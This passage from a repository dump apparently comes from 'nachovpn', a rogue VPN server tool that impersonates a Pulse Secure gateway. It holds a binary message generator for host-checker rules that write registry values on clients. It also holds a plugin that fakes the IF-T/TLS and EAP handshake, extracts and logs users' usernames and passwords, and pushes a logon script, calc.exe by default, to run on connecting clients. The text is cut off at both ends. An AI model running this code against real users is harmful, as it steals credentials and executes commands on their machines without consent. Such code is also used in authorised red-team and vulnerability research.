rules is None: rules = [{}] # If rules is a single dict, wrap it in a list if isinstance(rules, dict): rules = [rules] # Defaults for a rule default_rule = { 'rulename': 'woot', 'subkey': 'SOFTWARE\\Classes\\abc', 'regname': 'woot', 'hive': 'HKEY_LOCAL_MACHINE', 'value': 'pwnd', } # Parameter0: always present ce7_entries = [{ 'id': MSG_POLICY, 'string': f'\n\x00', 'flag1': 0xC0, 'flag2': 0x00 }] # Add params for idx, user_rule in enumerate(rules, 1): rule = default_rule.copy() rule.update(user_rule) reg_type = rule.get('type', 'String') # if type is DWORD convert to integer if reg_type == 'DWORD': rule['value'] = int(rule['value']) base64encoded = 0 else: rule['value'] = FunkManager.base64_encode(rule['value']) base64encoded = 1 ce7_entries.append({ 'id': MSG_POLICY, 'string': f'\n' f'\n\x00', 'flag1': 0xC0, 'flag2': 0x00 }) commands = { "0x0ce4": [{ "commands": { "0x0ce7": ce7_entries }, "flag1": 0xC0, "flag2": 0x00 }], "0x0cf3": [{ "value": 1, "flag1": 0x80, "flag2": 0x00 }] } return commands @staticmethod def parse(data): """Parse the provided binary data into structured commands.""" logging.info("Parsing data...") decompressed_data = zlib.decompress(data) commands = FunkManager._parse_commands(decompressed_data) return FunkManager._commands_to_dict(commands) @staticmethod def pad(data): num = 0 if len(data) & 3: num = 4 - (len(data) & 3) logging.debug(f'Funk padding: {num}') return data + b'\x00' * num @staticmethod def generate(commands): """Generate binary data from structured commands.""" logging.info("Generating data...") serialized_commands = FunkManager._serialize_commands(commands) compressed_data = zlib.compress(serialized_commands) # Add header buf = BytesIO() buf.write(0x16.to_bytes(4, 'big')) # Zlib compressed data header buf.write(b'\xC0') # Flag1 buf.write(b'\x00') # Flag2 buf.write((len(compressed_data) + 16).to_bytes(2, 'big')) # Length of data + header buf.write(VENDOR_JUNIPER2.to_bytes(4, 'big')) # Vendor buf.write(len(serialized_commands).to_bytes(4, 'big')) # Uncompressed length buf.write(compressed_data) return FunkManager.pad(buf.getvalue()) @staticmethod def _parse_commands(data): commands = [] buffer = BytesIO(data) while buffer.tell() < len(data): start = buffer.tell() if len(data) - buffer.tell() < 12: logging.error(f"Remaining data too small for header at offset {start}") break # Read the header cmd = int.from_bytes(buffer.read(4), "big") flag1 = ord(buffer.read(1)) # Flag flag2 = ord(buffer.read(1)) # Should be 0x00 length = int.from_bytes(buffer.read(2), "big") # Length of the command including the header reserved = buffer.read(4) # Should be 0x583 assert reserved == VENDOR_JUNIPER2.to_bytes(4, "big") # Validate the length field if length < 12 or (start + length) > len(data): logging.error( f"Invalid length detected at offset {hex(start)}: {length} " f"(remaining: {len(data) - buffer.tell()})" ) break logging.debug( f"Parsing Command: {cmd:04x}, Flags: {flag1:02x} {flag2:02x}, " f"Reserved: {reserved.hex()}, Length: {length}, Offset: {start}" ) # Read the command body body = buffer.read(length - 12) commands.append((cmd, flag1, flag2, body)) # Handle padding to the nearest word boundary (4 bytes) padding = (4 - (buffer.tell() % 4)) % 4 if padding > 0: padding_bytes = buffer.read(padding) if any(padding_bytes): logging.warning(f"Non-null padding detected at offset {buffer.tell() - padding}: {padding_bytes.hex()}") return commands @staticmethod def _commands_to_dict(commands): parsed = {} for cmd, flag1, flag2, body in commands: if cmd == 0x0ce7: # String buffer = BytesIO(body) id = int.from_bytes(buffer.read(4), "big") string = buffer.read().decode('utf-8', errors='replace') string_repr = repr(string) logging.info(f"Command 0x0ce7: ID={hex(id)}, String={string_repr}") parsed.setdefault("0x0ce7", []).append({ "id": id, "string": string, "flag1": flag1, "flag2": flag2 }) elif cmd == 0x0cf3: # Unsigned integer value = int.from_bytes(body, "big") logging.info(f"Command 0x0cf3: Value={value}") parsed.setdefault(f"0x0cf3", []).append({ "value": value, "flag1": flag1, "flag2": flag2 }) elif cmd == 0x0012: # Unsigned integer value = int.from_bytes(body, "big") logging.info(f"Command 0x0012: Value={value}") parsed.setdefault(f"0x0012", []).append({ "value": value, "flag1": flag1, "flag2": flag2 }) elif cmd == 0x0ce4: # Encapsulation nested_commands = FunkManager._parse_commands(body) nested_parsed = FunkManager._commands_to_dict(nested_commands) logging.info(f"Command 0x0ce4: Encapsulated {nested_parsed}") parsed.setdefault("0x0ce4", []).append({ "commands": nested_parsed, "flag1": flag1, "flag2": flag2 }) elif cmd == 0x0cf0: # Another type of encapsulation nested_commands = FunkManager._parse_commands(body) nested_parsed = FunkManager._commands_to_dict(nested_commands) logging.info(f"Command 0x0cf0: Encapsulated {nested_parsed}") parsed.setdefault("0x0cf0", []).append({ "commands": nested_parsed, "flag1": flag1, "flag2": flag2 }) elif cmd == 0x0cf1: # String without hex prefixer string = body.decode('utf-8', errors='replace').rstrip('\x00') string_repr = repr(string) logging.info(f"Command 0x0cf1: String={string_repr}") parsed.setdefault("0x0cf1", []).append({ "string": string, "flag1": flag1, "flag2": flag2 }) else: logging.warning(f"Unknown Command 0x{cmd:04x}: Raw Body={body.hex()}") parsed.setdefault(f"0x{cmd:04x}", []).append({ "body": body, "flag1": flag1, "flag2": flag2 }) return parsed @staticmethod def _serialize_commands(commands): """Serialize commands from the parsed dictionary format back to binary.""" serialized = BytesIO() # Handle commands by type from the parsed dictionary format for cmd_type, cmd_list in commands.items(): cmd_num = int(cmd_type, 16) # Convert hex string (e.g. '0x0ce7') to int for cmd_data in cmd_list: # Extract flags if present, default to 0x00 if not flag1 = cmd_data.get('flag1', 0x00) flag2 = cmd_data.get('flag2', 0x00) if cmd_num == 0x0ce7: # Handle string command - each command gets its own header body = BytesIO() body.write(cmd_data['id'].to_bytes(4, "big")) string_bytes = cmd_data['string'].encode("utf-8") body.write(string_bytes) body_content = body.getvalue() length = len(body_content) + 12 # Write header header = struct.pack(">IBBHI", cmd_num, # 4 bytes command flag1, # 1 byte flag1 flag2, # 1 byte flag2 length, # 2 bytes length VENDOR_JUNIPER2 # 4 bytes vendor ) serialized.write(header) serialized.write(body_content) # Add padding to nearest word boundary padding = (4 - (serialized.tell() % 4)) % 4 if padding > 0: serialized.write(b"\x00" * padding) elif cmd_num == 0x0cf3 or cmd_num == 0x0012: # Unsigned integer command value = cmd_data['value'] if isinstance(cmd_data, dict) else cmd_data body_content = value.to_bytes(4, "big") length = len(body_content) + 12 # Write header header = struct.pack(">IBBHI", cmd_num, # 4 bytes command flag1, # 1 byte flag1 flag2, # 1 byte flag2 length, # 2 bytes length VENDOR_JUNIPER2 # 4 bytes vendor ) serialized.write(header) serialized.write(body_content) # Add padding to nearest word boundary padding = (4 - (serialized.tell() % 4)) % 4 if padding > 0: serialized.write(b"\x00" * padding) elif cmd_num == 0x0ce4: # Encapsulation # Handle nested commands nested_commands = cmd_data.get('commands', cmd_data) nested_data = FunkManager._serialize_commands(nested_commands) length = len(nested_data) + 12 # Write single header for all nested commands header = struct.pack(">IBBHI", cmd_num, # 4 bytes command flag1, # 1 byte flag1 flag2, # 1 byte flag2 length, # 2 bytes length VENDOR_JUNIPER2 # 4 bytes vendor ) serialized.write(header) serialized.write(nested_data) # Add padding to nearest word boundary padding = (4 - (serialized.tell() % 4)) % 4 if padding > 0: serialized.write(b"\x00" * padding) elif cmd_num == 0x0cf0: # Another type of encapsulation # Handle nested commands nested_commands = cmd_data.get('commands', cmd_data) nested_data = FunkManager._serialize_commands(nested_commands) length = len(nested_data) + 12 # Write header header = struct.pack(">IBBHI", cmd_num, # 4 bytes command flag1, # 1 byte flag1 flag2, # 1 byte flag2 length, # 2 bytes length VENDOR_JUNIPER2 # 4 bytes vendor ) serialized.write(header) serialized.write(nested_data) # Add padding to nearest word boundary padding = (4 - (serialized.tell() % 4)) % 4 if padding > 0: serialized.write(b"\x00" * padding) elif cmd_num == 0x0cf1: # String without hex prefixer string_bytes = cmd_data['string'].encode('utf-8') length = len(string_bytes) + 12 # Write header header = struct.pack(">IBBHI", cmd_num, # 4 bytes command flag1, # 1 byte flag1 flag2, # 1 byte flag2 length, # 2 bytes length VENDOR_JUNIPER2 # 4 bytes vendor ) serialized.write(header) serialized.write(string_bytes) # Add padding to nearest word boundary padding = (4 - (serialized.tell() % 4)) % 4 if padding > 0: serialized.write(b"\x00" * padding) return serialized.getvalue() if __name__ == "__main__": parser = argparse.ArgumentParser(description='Parse and generate Funk binary data.') parser.add_argument('-i', '--input', help='Input binary file to parse') parser.add_argument('-o', '--output', help='Output file for generated data') parser.add_argument('-v', '--verbose', action='store_true', help='Enable verbose logging') parser.add_argument('--output-json', action='store_true', help='Output JSON instead of binary') # Command options can be supplied as a JSON file or as command line arguments parser.add_argument('-j', '--json', help='JSON file containing the command dictionary') # Command line arguments for manual generation parser.add_argument('--time', action='store_true', help='Use current time for server_time') parser.add_argument('--subkey', help='Subkey for registry command', default='SOFTWARE\\Classes\\abc') parser.add_argument('--rulename', help='Rule name for registry command', default='woot') parser.add_argument('--regname', help='Registry name for registry command', default='woot') parser.add_argument('--policy', help='Policy for policydata command', default='vc0|43|policy_2|1|woot') parser.add_argument('--hive', help='Registry hive', default='HKEY_LOCAL_MACHINE') parser.add_argument('--value', help='Registry value (will be base64 encoded)', default='pwnd') args = parser.parse_args() log_level = logging.DEBUG if args.verbose else logging.INFO logging.basicConfig(level=log_level) # Get commands either from JSON or generate from arguments if args.json: try: with open(args.json, 'r') as f: commands = json.load(f) except Exception as e: logging.error(f"Error loading JSON file: {e}") exit(1) else: # Generate commands from command line arguments commands = FunkManager.registry_command( args.rulename, args.subkey, args.regname, args.policy, args.hive, args.value ) # Parse input file if provided if args.input: try: with open(args.input, "rb") as f: input_data = f.read() parsed_data = FunkManager.parse(input_data) logging.info(f"Parsed input data: {parsed_data}") except Exception as e: logging.error(f"Error parsing input file: {e}") # Generate output if args.output: try: if args.output_json: # Output the command dictionary as JSON with open(args.output, 'w') as f: json.dump(commands, f, indent=4) else: # Generate binary output generated_data = FunkManager.generate(commands) with open(args.output, "wb") as f: f.write(generated_data) logging.info(f"Generated data written to '{args.output}'") except Exception as e: logging.error(f"Error generating output file: {e}") exit(1) ================================================ FILE: src/nachovpn/plugins/pulse/plugin.py ================================================ from nachovpn.plugins import VPNPlugin from nachovpn.plugins.pulse.config_generator import VPNConfigGenerator, ESPConfigGenerator from nachovpn.plugins.pulse.funk_parser import FunkManager import random import string import os import io import socket import ssl import json """ Note: these values are from openconnect/pulse.c See: https://github.com/openconnect/openconnect/blob/master/pulse.c References: - https://www.infradead.org/openconnect/pulse.html - https://www.infradead.org/openconnect/juniper.html - https://trustedcomputinggroup.org/wp-content/uploads/TNC_IFT_TLS_v2_0_r8.pdf """ IFT_VERSION_REQUEST = 1 IFT_VERSION_RESPONSE = 2 IFT_CLIENT_AUTH_REQUEST = 3 IFT_CLIENT_AUTH_SELECTION = 4 IFT_CLIENT_AUTH_CHALLENGE = 5 IFT_CLIENT_AUTH_RESPONSE = 6 IFT_CLIENT_AUTH_SUCCESS = 7 EAP_REQUEST = 1 EAP_RESPONSE = 2 EAP_SUCCESS = 3 EAP_FAILURE = 4 IFT_TLS_CLIENT_INFO = 0x88 VENDOR_JUNIPER = 0xa4c VENDOR_JUNIPER2 = 0x583 VENDOR_TCG = 0x5597 JUNIPER_1 = 0xa4c01 EAP_TYPE_EXPANDED= 0xfe AVP_CODE_EAP_MESSAGE = 0x4f # 0xfe000a4c EXPANDED_JUNIPER = ((EAP_TYPE_EXPANDED << 24) | VENDOR_JUNIPER) AVP_VENDOR = 0x80 AVP_OS_INFO = 0xD5E AVP_USER_AGENT = 0xD70 AVP_LANGUAGE = 0xD5F AVP_REALM = 0xD50 # Request codes for the Juniper Expanded/2 auth requests. J2_PASSCHANGE = 0x43 J2_PASSREQ = 0x01 J2_PASSRETRY = 0x81 J2_PASSFAIL = 0xc5 LICENSE_ID = ''.join(random.choices(string.ascii_uppercase + string.digits, k=17)) class IFTPacket: def __init__(self, vendor_id=None, message_type=None, message_identifier=None, message_value=None): self.vendor_id = vendor_id self.message_type = message_type self.message_identifier = message_identifier self.message_value = message_value if message_value else bytearray() self.message_length = len(self.message_value) + 16 def __str__(self): return f'IF-T Packet: Vendor={hex(self.vendor_id)}, Message Type={self.message_type}, ' \ f'Message Length={self.message_length}, Message Identifier={hex(self.message_identifier)}, ' \ f'Message Value={self.message_value.hex()}' def to_bytes(self): # Recalculate length self.message_length = len(self.message_value) + 16 return self.vendor_id.to_bytes(4, 'big') + \ self.message_type.to_bytes(4, 'big') + \ self.message_length.to_bytes(4, 'big') + \ self.message_identifier.to_bytes(4, 'big') + \ self.message_value @classmethod def from_bytes(cls, data): if len(data) < 16: raise ValueError("Data too short to parse IF-T packet") reader = io.BytesIO(data) return cls.from_io(reader) @classmethod def from_io(cls, reader): if reader.getbuffer().nbytes < 16: raise ValueError("Data too short to parse IF-T packet") vendor_id = int.from_bytes(reader.read(4), 'big') message_type = int.from_bytes(reader.read(4), 'big') message_length = int.from_bytes(reader.read(4), 'big') message_identifier = int.from_bytes(reader.read(4), 'big') message_value = reader.read(message_length - 16) return cls(vendor_id, message_type, message_identifier, message_value) class EAPPacket: def __init__(self, vendor=None, code=None, identifier=None, eap_data=bytearray()): self.vendor = vendor self.code = code self.identifier = identifier self.eap_data = eap_data self.length = 4 + len(eap_data) def __str__(self): return f'EAP Packet: Vendor={hex(self.vendor)}, Code={self.code}, Identifier={hex(self.identifier)}, ' \ f'Length={self.length}, Data={self.eap_data.hex()}' def to_bytes(self): # Recalculate length self.length = 4 + len(self.eap_data) return self.vendor.to_bytes(4, 'big') \ + bytes([self.code, self.identifier]) \ + self.length.to_bytes(2, 'big') \ + self.eap_data @classmethod def from_bytes(cls, data): vendor = int.from_bytes(data[:4], 'big') code = data[4] identifier = data[5] length = int.from_bytes(data[6:8], 'big') eap_data = data[8:8 + length - 4] if length >= 4 else bytearray() return cls(vendor, code, identifier, eap_data) class AVP: def __init__(self, code, flags=0, vendor=None, value=bytearray()): self.code = code self.flags = flags self.vendor = vendor self.value = value # Calculate the initial length (8 bytes for the header, optionally 4 bytes for the vendor, plus the value length) self.length = 8 + (4 if vendor is not None else 0) + len(value) def padding_required(self): if self.length & 3: return 4 - (self.length & 3) return 0 @classmethod def from_bytes(cls, data): if len(data) < 8: raise ValueError("Packet too short to parse AVP") code = int.from_bytes(data[:4], 'big') length = int.from_bytes(data[4:8], 'big') & 0xffffff flags = data[4] vendor = None value_start = 8 if flags & AVP_VENDOR: if len(data) < 12: raise ValueError("Packet too short to parse AVP with vendor") vendor = int.from_bytes(data[8:12], 'big') value_start = 12 value = data[value_start:value_start + length - (12 if vendor else 8)] return cls(code, flags, vendor, value) def to_bytes(self, include_padding=False): # Re-calculate length to ensure it's current self.length = 8 + (4 if self.vendor is not None else 0) + len(self.value) avp_bytes = self.code.to_bytes(4, 'big') # Flags are stored in the most significant byte of the length field avp_bytes += (self.length | (self.flags << 24)).to_bytes(4, 'big') if self.vendor is not None: avp_bytes += self.vendor.to_bytes(4, 'big') avp_bytes += self.value if include_padding: avp_bytes += b'\x00' * self.padding_required() return avp_bytes def __str__(self): # Re-calculate length for display purposes self.length = 8 + (4 if self.vendor is not None else 0) + len(self.value) return f"AVP: Code={self.code}, Length={self.length}, " \ f"Flags={self.flags}, Vendor={self.vendor}, " \ f"Value={self.value.hex()}" class PulseSecurePlugin(VPNPlugin): REQUIRED_RULE_KEYS = {"rulename", "subkey", "regname", "hive", "value", "type"} ALLOWED_TYPES = {"String", "DWORD"} @staticmethod def validate_rules(rules): if not isinstance(rules, list): return False, "Rules file must be a JSON array of rule objects." for idx, rule in enumerate(rules): if not isinstance(rule, dict): return False, f"Rule at index {idx} is not a JSON object." missing = PulseSecurePlugin.REQUIRED_RULE_KEYS - rule.keys() if missing: return False, f"Rule at index {idx} is missing required keys: {', '.join(missing)}" for key in PulseSecurePlugin.REQUIRED_RULE_KEYS: if key != "value": if not isinstance(rule[key], str) or not rule[key].strip(): return False, f"Rule at index {idx} has invalid or empty value for key: {key}" if key == "type" and rule[key] not in PulseSecurePlugin.ALLOWED_TYPES: return False, f"Rule at index {idx} has invalid type: {rule[key]}" # Type-specific value checks if rule["type"] == "DWORD": try: int(rule["value"]) except Exception as e: return False, f"Rule at index {idx} has value for type {rule['type']} that cannot be parsed as integer: {rule['value']!r}: {e}" else: if not isinstance(rule["value"], str) or not rule["value"].strip(): return False, f"Rule at index {idx} has invalid or empty string value for type {rule['type']}" return True, None def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self.logon_script = os.getenv("PULSE_LOGON_SCRIPT", "C:\\Windows\\System32\\calc.exe") self.logon_script_macos = os.getenv("PULSE_LOGON_SCRIPT_MACOS", "") self.dns_suffix = os.getenv("PULSE_DNS_SUFFIX", "nachovpn.local") self.anonymous_auth = os.getenv("PULSE_ANONYMOUS_AUTH", "false").lower() == 'true' self.pulse_username = os.getenv("PULSE_USERNAME", "") self.pulse_save_connection = os.getenv("PULSE_SAVE_CONNECTION", "false").lower() == 'true' self.vpn_name = os.getenv("VPN_NAME", "NachoVPN") self._eap_identifier = 1 # Host checker policy self.host_checker_policy_id = f"vc0|43|policy_2|1|woot" # Load rules from JSON file self.host_checker_rules_file = os.getenv("PULSE_HOST_CHECKER_RULES_FILE") self.host_checker_rules = None if not self.host_checker_rules_file: self.logger.error("PULSE_HOST_CHECKER_RULES_FILE environment variable must be set to a JSON rules file.") else: try: with open(self.host_checker_rules_file, 'r', encoding='utf-8') as f: rules = json.load(f) valid, error = self.validate_rules(rules) if not valid: self.logger.error(f"Host checker rules validation failed: {error}") else: self.host_checker_rules = rules self.logger.info(f"Loaded host checker rules from {self.host_checker_rules_file}") except Exception as e: self.logger.error(f"Failed to load host checker rules from {self.host_checker_rules_file}: {e}") self.buffer_size = 4096 self.max_packet_size = 65535 def close(self): self.ssl_server_socket.close() def can_handle_data(self, data, client_socket, client_ip): if len(data) >= 4 and int.from_bytes(data[:4], 'big') == VENDOR_TCG: return True return False def can_handle_http(self, handler): user_agent = handler.headers.get('User-Agent', '') if 'odJPAService' in user_agent or \ 'Secure%20Access' in user_agent or \ handler.path == '/pulse': return True return False def handle_http(self, handler): if handler.command == 'GET': self.handle_get(handler) return True def has_credentials(self, data): # TODO: actually check properly if len(data) < 20 or self.expanded_juniper_subtype(data) != 1: return False # lazy: check for host checker signature if b'\xFE\x00\x0A\x4C\x00\x00\x00\x03' in data: return False user_avp = AVP.from_bytes(data[8:]) if user_avp.code == 0xD6D: return True return False def extract_credentials(self, data): # seems to be: EXPANDED_JUNIPER + subtype=0x01 + AVP(0xd6d) if len(data) < 20 or self.expanded_juniper_subtype(data) != 1: return False data = data[8:] user_avp = AVP.from_bytes(data) if user_avp.code != 0xD6D: return False username = user_avp.value.decode() self.logger.info(f'Extracted username: {username}') # remove any padding padding_size = user_avp.padding_required() data = data[user_avp.length+padding_size:] # the next bytes *should* be 0x4f in big endian if int.from_bytes(data[0:4], 'big') != 79: self.logger.error('AVP_CODE_EAP_MESSAGE not found') return False if len(data) < 0x16: self.logger.error('Data too short to extract password') return False # there are some other fields/headers here we should maybe check # but for now we'll just extract the password length = int(data[0x16]) - 2 if len(data) < 0x17 + length: self.logger.error('Data too short to extract password') return False password = data[0x17:0x17+length].decode() self.logger.info(f'Extracted password: {password}') self.log_credentials(username, password) return True def handle_get(self, handler): if handler.path == '/': self.logger.info('Switching protocols ..') handler.send_response(101) handler.send_header('Content-Type', 'application/octet-stream') handler.send_header('Pragma', 'no-cache') handler.send_header('Upgrade', 'IF-T/TLS 1.0') handler.send_header('Connection', 'Upgrade') handler.send_header('HC_HMAC_VERSION_COOKIE', '1') handler.send_header('supportSHA2Signature', '1') handler.send_header('Connection', 'Keep-Alive') handler.send_header('Keep-Alive', 'timeout=15') handler.send_header('Strict-Transport-Security', 'max-age=31536000') handler.send_header('accept-ch', 'Sec-CH-UA-Platform-Version') handler.end_headers() # transition to IF-T/TLS self.logger.info('Transitioning to IF-T/TLS ..') self.handle_data(None, handler.connection, handler.client_address[0]) elif handler.path == '/pulse': self.logger.info('Sending URI handler response ..') html = "" handler.send_response(200) handler.send_header('Content-Type', 'text/html') handler.end_headers() handler.wfile.write(html.encode()) def next_eap_identifier(self): self._eap_identifier += 1 if self._eap_identifier >= 5: self._eap_identifier = 1 return self._eap_identifier def is_policy_request(self, data): result = self.is_policy_type(data) and b'parameter name="policy_request"' in data self.logger.debug(f'is_policy_request: {result}') return result def is_policy_type(self, data): # seems to be: EXPANDED_JUNIPER + 0x01 + AVP(0xd6d) if len(data) < 20 or self.expanded_juniper_subtype(data) != 1: return False data = data[8:] user_avp = AVP.from_bytes(data) if user_avp.code != 0xD6D: return False username = user_avp.value.decode() self.logger.info(f'Extracted username: {username}') # remove any padding padding_size = user_avp.padding_required() data = data[user_avp.length+padding_size:] # the next bytes *should* be 0x4f in big endian if int.from_bytes(data[0:4], 'big') != 79: self.logger.error('AVP_CODE_EAP_MESSAGE not found') return False return True def expanded_juniper_subtype(self, data): if len(data) < 8 or \ int.from_bytes(data[0:4], 'big') != EXPANDED_JUNIPER: return None return int.from_bytes(data[4:8], 'big') def is_funk_message(self, data): if len(data) < 16 or self.expanded_juniper_subtype(data) != 1: return False # lazy: just check for the 0xD6D AVP and the funk message signature # TODO: create an EXPANDED_JUNIPER class for easier (de)serialization user_avp = AVP.from_bytes(data[8:]) if user_avp.code == 0xD6D and b'\x00\x00\x00\x16\xC0\x00\x00' in data: return True return False def is_client_info(self, data): self.logger.debug(f'is_client_info input: {data.hex()}') if len(data) < 24 or self.expanded_juniper_subtype(data) != 1: return False data = data[8:] # check if the first AVP is 0xD49 avp = AVP.from_bytes(data) if avp.code != 0xD49: return False self.logger.info(f"AVP: Code={avp.code:04X}, Value={avp.value.hex()}") # check if the second AVP is 0xD61 data = data[avp.length+avp.padding_required():] avp = AVP.from_bytes(data) if avp.code != 0xD61: return False self.logger.info(f"AVP: Code={avp.code:04X}, Value={avp.value.hex()}") # read the rest of the AVPs # TODO: log the client provided AVP data # this contains OS info, user-agent, etc. data = data[avp.length+avp.padding_required():] while len(data) > 0: avp = AVP.from_bytes(data) self.logger.info(f"AVP: Code={avp.code:04X}, Value={avp.value.hex()}") data = data[avp.length+avp.padding_required():] return True def auth_completed(self, data): if len(data) < 24 or self.expanded_juniper_subtype(data) != 1: return False avp = AVP.from_bytes(data[8:]) return avp.code == 0xD6B and \ int.from_bytes(avp.value, 'big') == 0x10 def parse_eap_packet(self, data, client_socket, connection_id): outbuf = bytearray() if int.from_bytes(data[0:4], 'big') != JUNIPER_1: self.logger.warning('Received invalid EAP packet') return outbuf eap_in = EAPPacket.from_bytes(data) self.logger.debug(eap_in) # EAP Packet: Vendor=0xa4c01, Code=2, Identifier=0x1, Length=14, Data=01616e6f6e796d6f7573 if eap_in.code == EAP_RESPONSE and eap_in.identifier == 1 and not self.anonymous_auth and eap_in.eap_data[1:] == b'anonymous': self.logger.info('Received anonymous auth, sending server info ..') # Add the AVP data avp_list = [] avp_list.append(AVP(code=0xD49, flags=AVP_VENDOR, vendor=VENDOR_JUNIPER2, value=(4).to_bytes(4, 'big'))) avp_list.append(AVP(code=0xD4A, flags=AVP_VENDOR, vendor=VENDOR_JUNIPER2, value=(1).to_bytes(4, 'big'))) avp_list.append(AVP(code=0xD56, flags=AVP_VENDOR, vendor=VENDOR_JUNIPER2, value=LICENSE_ID.encode())) # Create the EAP data from AVP eap_data = bytearray() eap_data += EXPANDED_JUNIPER.to_bytes(4, 'big') eap_data += (1).to_bytes(4, 'big') for avp in avp_list: eap_data += avp.to_bytes(include_padding=True) # Construct EAP packet eap = EAPPacket(vendor=JUNIPER_1, code=EAP_REQUEST, identifier=self.next_eap_identifier(), eap_data=eap_data) # Build IFT packet reply = IFTPacket(vendor_id=VENDOR_TCG, message_type=0x5, message_identifier=0x01F7, message_value=eap.to_bytes()) # Append to output buffer outbuf += reply.to_bytes() # EAP Packet: Vendor=0xa4c01, Code=2, Identifier=0x2, Length=296, Data=fe000a4c0000000100000d4980000010000005830000000400000d61 .. elif eap_in.code == EAP_RESPONSE and not self.anonymous_auth and not self.host_checker_rules and self.is_client_info(eap_in.eap_data): self.logger.info('Received AVP structures with OS data. Asking for creds..') outer_eap_data = bytearray() outer_eap_data += EXPANDED_JUNIPER.to_bytes(4, 'big') outer_eap_data += (1).to_bytes(4, 'big') # This is the EAP data encapsulated in AVP (which is itself encapsulated in EAP/IF-T/TLS) inner_eap_data = bytearray() inner_eap_data += EXPANDED_JUNIPER.to_bytes(4, 'big') inner_eap_data += (2).to_bytes(4, 'big') # subtype: J2 inner_eap_data += J2_PASSREQ.to_bytes(1, 'big') # J2 password request inner_eap = EAPPacket(vendor=JUNIPER_1, code=EAP_REQUEST, identifier=0x00, eap_data=inner_eap_data) # Build the AVP data from inner EAP data (without vendor) avp = AVP(code=0x4f, flags=0x40, value=inner_eap.to_bytes()[4:]) # Add AVP data to outer EAP data outer_eap_data += avp.to_bytes(include_padding=True) # Construct outer EAP packet outer_eap = EAPPacket(vendor=JUNIPER_1, code=EAP_REQUEST, identifier=self.next_eap_identifier(), eap_data=outer_eap_data) # Build IFT packet reply = IFTPacket(vendor_id=VENDOR_TCG, message_type=0x05, message_identifier=0x01F8, message_value=outer_eap.to_bytes()) # Append to output buffer outbuf += reply.to_bytes() # EAP Packet: Vendor=0xa4c01, Code=2, Identifier=0x3, Length=56, Data=fe000a4c0000000100000d6d8000001000000583616161610000004f4000001a02000012fe000a4c000000020202056161610583 elif eap_in.code == EAP_RESPONSE and (self.anonymous_auth and eap_in.eap_data[1:] == b'anonymous') or self.has_credentials(eap_in.eap_data): self.logger.info('Received credentials, sending back some cookies ..') if not self.anonymous_auth and not self.extract_credentials(eap_in.eap_data): self.logger.warning("Failed to extract credentials") return bytearray() # Build the AVP data dynamically using the AVP class avp_list = [] avp_list.append(AVP(code=0xD53, flags=AVP_VENDOR, vendor=VENDOR_JUNIPER2, value=os.urandom(16).hex().encode())) # DSID cookie avp_list.append(AVP(code=0xD8B, flags=AVP_VENDOR, vendor=VENDOR_JUNIPER2, value=os.urandom(8).hex().encode())) # ?? avp_list.append(AVP(code=0xD8D, flags=AVP_VENDOR, vendor=VENDOR_JUNIPER2, value=bytearray())) # ?? avp_list.append(AVP(code=0xD5C, flags=AVP_VENDOR, vendor=VENDOR_JUNIPER2, value=(3600).to_bytes(4, 'big'))) # auth expiry avp_list.append(AVP(code=0xD54, flags=AVP_VENDOR, vendor=VENDOR_JUNIPER2, value=b'10.0.1.4')) avp_list.append(AVP(code=0xD55, flags=AVP_VENDOR, vendor=VENDOR_JUNIPER2, value=self.get_thumbprint()['md5'].encode())) # cert MD5 avp_list.append(AVP(code=0xD6B, flags=AVP_VENDOR, vendor=VENDOR_JUNIPER2, value=b'\x00\x00\x00\x10')) # ?? avp_list.append(AVP(code=0xD75, flags=AVP_VENDOR, vendor=VENDOR_JUNIPER2, value=b'\x00\x00\x00\x00')) # idle timeout avp_list.append(AVP(code=0xD57, flags=AVP_VENDOR, vendor=VENDOR_JUNIPER2, value=b'\x00\x00\x00\x00')) # ?? # Create the EAP data eap_data = bytearray() # EXPANDED_JUNIPER struct eap_data += EXPANDED_JUNIPER.to_bytes(4, 'big') eap_data += (1).to_bytes(4, 'big') # subtype # Add AVPs for avp in avp_list: eap_data += avp.to_bytes() # Construct EAP packet eap = EAPPacket(vendor=JUNIPER_1, code=EAP_REQUEST, identifier=self.next_eap_identifier(), eap_data=eap_data) # Build IFT packet reply = IFTPacket(vendor_id=VENDOR_TCG, message_type=IFT_CLIENT_AUTH_CHALLENGE, message_identifier=0x01FB, message_value=eap.to_bytes()) # Append to output buffer outbuf += reply.to_bytes() # EAP Packet: Vendor=0xa4c01, Code=2, Identifier=0x4, Length=28, Data=fe000a4c0000000100000d6b800000100000058300000010 elif eap_in.code == EAP_RESPONSE and self.auth_completed(eap_in.eap_data): self.logger.info('Auth completed, sending configuration and launching application...') outbuf = bytearray() # Get the assigned IP from the packet handler client_ip = self.packet_handler.get_assigned_ip(connection_id) if not client_ip: self.logger.error("No IP allocated for client") return outbuf # Auth response (ok) eap = EAPPacket(vendor=JUNIPER_1, code=EAP_SUCCESS, identifier=self.next_eap_identifier(), eap_data=bytearray()) reply = IFTPacket(vendor_id=VENDOR_TCG, message_type=IFT_CLIENT_AUTH_SUCCESS, message_identifier=0x01FD, message_value=eap.to_bytes()) client_socket.sendall(reply.to_bytes()) # config packet, wrapped with IF-T generator = VPNConfigGenerator( logon_script=self.logon_script, logon_script_macos=self.logon_script_macos, client_ip=client_ip ) config = generator.create_config()[0x10:] reply = IFTPacket(vendor_id=VENDOR_JUNIPER, message_type=1, message_identifier=0x01FE, message_value=config) client_socket.sendall(reply.to_bytes()) # now send the ESP config esp_config = ESPConfigGenerator().create_config() reply = IFTPacket(vendor_id=VENDOR_JUNIPER, message_type=1, message_identifier=0x200, message_value=esp_config) client_socket.sendall(reply.to_bytes()) # End of configuration packet reply = IFTPacket(vendor_id=VENDOR_JUNIPER, message_type=0x8F, message_identifier=0x201, message_value=b'\x00\x00\x00\x00') client_socket.sendall(reply.to_bytes()) # Final packet - send the license ID reply = IFTPacket(vendor_id=VENDOR_TCG, message_type=0x96, message_identifier=0x202, message_value=LICENSE_ID.encode()) client_socket.sendall(reply.to_bytes()) # This branch handles all EAP response messages for the host checker elif eap_in.code == EAP_RESPONSE and self.host_checker_rules and not self.anonymous_auth: self.logger.info('Received EAP_RESPONSE for host checker') # TODO: we got a policy response, we need to actually parse the result if b'policy:vc0' in eap_in.eap_data and b'status:OK' in eap_in.eap_data: self.logger.info('Received host checker OK response. Asking for creds..') outer_eap_data = bytearray() outer_eap_data += EXPANDED_JUNIPER.to_bytes(4, 'big') outer_eap_data += (1).to_bytes(4, 'big') # This is the EAP data encapsulated in AVP (which is itself encapsulated in EAP/IF-T/TLS) inner_eap_data = 